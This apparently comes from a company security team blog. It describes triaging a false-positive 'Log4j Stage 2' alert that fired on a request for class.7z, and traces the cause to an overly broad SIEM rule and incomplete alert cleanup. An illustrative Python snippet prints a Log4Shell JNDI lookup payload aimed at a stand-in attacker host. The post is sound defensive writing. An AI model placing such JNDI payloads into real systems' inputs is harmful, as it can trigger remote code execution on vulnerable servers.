Echoes of Log4Shell

Originally composed February 18, 2022

When CVE-2021-44228 (Log4Shell) broke in December of 2021, the Code42 SecOps team moved quickly to respond by monitoring the latest news, developing strategies to test our systems for the vulnerability, and, of course, establishing alerts based on the evolving indicators of compromise (IoCs).

After the fervor and frenzy of December waned and we returned to something resembling a usual workday, we addressed the resulting alert fatigue and sprawl by keeping the valuable alerts and disabling the rest.

We made the necessary changes to remove the disabled alerts and went about our days doing Purple Team Stuff.

Until today.

Today, an alert named “Log4j Stage 2” appeared in our queue. My first thought was, “of course.” After all, the Friday before a three-day weekend is statistically proven to be the day on which there is at least a 75% chance of a major security incident.

My second thought was “wait, what?”

Those of you who recall the Log4Shell exploit may remember that the “Stage 2” action of the attack (downloading the malicious class) would only be detected on internal systems if they were being used to host the malicious payload.

[Attack scenario diagram. Credit: Luciano Avendano]
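To ground those two stages, here is a purely illustrative Python sketch; the hostnames and paths are invented for this post and are not real indicators.

# Purely illustrative: what the two stages of the attack roughly look like.
# The hostnames and paths below are made up for this example.

# Stage 1: the attacker sends a JNDI lookup string that a vulnerable Log4j
# instance will evaluate, often smuggled in a header or form field.
stage1_payload = "${jndi:ldap://attacker-controlled.example/Exploit}"

# Stage 2: a host then issues an HTTP(S) GET to fetch the malicious Java class.
# This is only visible on our side if one of our systems is serving that payload.
stage2_request = "GET /Exploit.class HTTP/1.1"

print(stage1_payload)
print(stage2_request)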

If this is a true positive, it may indicate that one of our hosts has been compromised and is now being used to deliver malicious Java classes to an external party… yikes! Big yikes!

Before I pushed the big red button, however, I had to do my due diligence. This was the first time this alert had ever been triggered, and it was well worth validating the findings.

One of the greatest skills I have learned in my years handling incidents is the power of taking a big, deep breath to release the sense of urgency and tension upon discovery. That deep breath gives my rational brain space to correlate and draw conclusions about the cold hard facts: the data itself.

Let’s take a look at the events that triggered the alert:

[source_ip] - - [17/Feb/2022:17:42:20 -0600] "GET http://crashplan.com/class.7z HTTP/1.1" 302 138 "-" "Mozilla/9.0 AppleWebKit/202110.05 (KHTML, like Gecko) Chrome/20.21.1005.122 Safari/211.05" "-" - -

[source_ip] - - [17/Feb/2022:17:36:28 -0600] "GET https://crashplan.com/class.7z HTTP/1.1" 302 138 "-" "Mozilla/9.0 AppleWebKit/202110.05 (KHTML, like Gecko) Chrome/20.21.1005.122 Safari/211.05" "-" - -
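For anyone following along at home, here is a rough sketch of how these combined-format lines can be split into fields for triage; the regex is simplified and assumes only the (redacted) layout shown above, not a general-purpose parser.

# Rough sketch: pull the interesting fields out of a log line like the ones above.
import re

LOG_PATTERN = re.compile(
    r'\[(?P<src>[^\]]+)\] - - '             # redacted source IP
    r'\[(?P<time>[^\]]+)\] '                # timestamp
    r'"(?P<method>\S+) (?P<url>\S+) \S+" '  # request line
    r'(?P<status>\d{3}) (?P<bytes>\d+)'     # response status and size
)

line = ('[source_ip] - - [17/Feb/2022:17:42:20 -0600] '
        '"GET http://crashplan.com/class.7z HTTP/1.1" 302 138')

match = LOG_PATTERN.search(line)
if match:
    print(match.group("method"), match.group("url"), match.group("status"))
    # -> GET http://crashplan.com/class.7z 302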

What stood out to me, and what may stand out to you, is that this HTTP GET request is not attempting to download the expected file type (.class). Rather, it is attempting to download a file with a .7z (7-Zip) extension. Clearly something in this detection wasn’t well defined.

Now, we all know that a file’s name and its actual type are not always in sync, but for the sake of this exercise I will assume the external party was intentionally seeking to download a 7-Zip file.

The next thing you will notice is that the server returned an HTTP 302 (“Found”) response. I was curious where it redirected, so I followed the URL; it redirected to a 404. Oh, and by the way, the Code42 404 page is delightful and you should totally check it out.
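If you want to reproduce that check yourself, something like the following does the trick, assuming the requests library is installed; the behavior of that URL may well have changed by the time you read this.

# Follow the URL from the log and see where the redirect lands.
import requests

resp = requests.get("http://crashplan.com/class.7z", allow_redirects=True, timeout=10)

print([hop.status_code for hop in resp.history])  # the redirect chain, e.g. [302]
print(resp.status_code)                           # final status (a 404 when I checked)
print(resp.url)                                   # where the redirect ended up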

Anyway, clearly this was some errant, random web request that happened to match our alert definition. Now that I had validated what happened and ruled out system compromise, I was curious exactly why this event triggered the alert.

As soon as I saw the query definition in our SIEM, the answer was clear. The alert was configured to search for:

  • HTTP GET Requests
  • That contain the string “class” in the raw text.

And that was it! Wow, those are some broad search terms. You can see that the events above were caught simply because the string “class” was present in the HTTP request. Perhaps this alert definition would have been more effective if it had been looking for the string “.class”!
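To make the point concrete, here is a quick illustration using plain substring matching (our actual SIEM query syntax is different, but the idea is the same; the second URL is made up for this example):

# Quick illustration of the false positive: matching on "class" catches
# class.7z just as readily as a real malicious class download would.
observed_url = "http://crashplan.com/class.7z"
hypothetical_stage2_url = "http://payload-host.example/Exploit.class"  # made up

print("class" in observed_url)              # True  -> the broad term fires
print(".class" in observed_url)             # False -> the tighter term would not
print(".class" in hypothetical_stage2_url)  # True  -> and it still catches real activity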

Mystery solved! Well, kind of. Remember how I mentioned that our team went through alert cleanup as we closed the book on our Log4Shell response?

Well, we had.

With my very own eyes I confirmed that this specific alert was no longer present in our server configuration, but somehow it had still generated an incident in our SOAR platform, Palo Alto XSOAR.

A bit of digging later, and it turns out we’ve got a project on our hands: implementing the D part of CRUD (Create, Read, Update, Delete) in our Ansible playbooks. But that’s a blog post for another day.

Cheers, and stay safe out there!


Follow me on Medium for more (well, mostly the same in a different interface) blog content!

https://medium.com/@laura.farvour